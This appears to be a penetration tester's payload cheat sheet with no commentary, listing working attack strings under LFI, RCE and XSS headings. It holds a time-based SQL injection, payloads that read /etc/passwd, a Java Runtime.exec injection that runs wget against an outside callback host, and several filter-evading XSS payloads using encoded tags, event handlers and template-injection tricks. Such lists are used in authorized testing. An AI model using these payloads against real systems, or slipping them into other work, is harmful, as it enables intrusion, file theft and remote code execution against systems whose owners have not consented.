SELECT 1 WHERE (SELECT BENCHMARK(100000000, MD5('A'))); https://blog.dixitaditya.com/xss-to-read-internal-files LFI === openURL("file:///etc/passwd","new tab"); return ""; SELECT CAST(LOAD_FILE('/etc/passwd','UTF-8') AS VARCHAR(10000)) AS file_content FROM information_schema.tables-- RCE === aaaffff111\'+"a"+eval(java.lang.Runtime.getRuntime().exec("/usr/bin/wget http://dm32zhmrx8wqs1udtuvjl8vpegk78bw0.oastify.com")));//+\' XSS === javascript://example.com/%0aalert(document.domain);// {{constructor.constructor('alert(1)')()}} d0mxss%3Ch3%3ECSP_blocked_the_below_Details_payload%3CdETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a()%20x%3E '" " accesskey="x" onload="alert(1)" x=" %60%29%3B%3B%28prompt%29%60%60%2F%2F%5C ixomid.xyzjdr01\74k asd \u0022\u003E\u003Cimg src\u003D1 onerror\u003D\u0070\u0072\u006F\u006D\u0070\u0074\u00281\u0029\u003E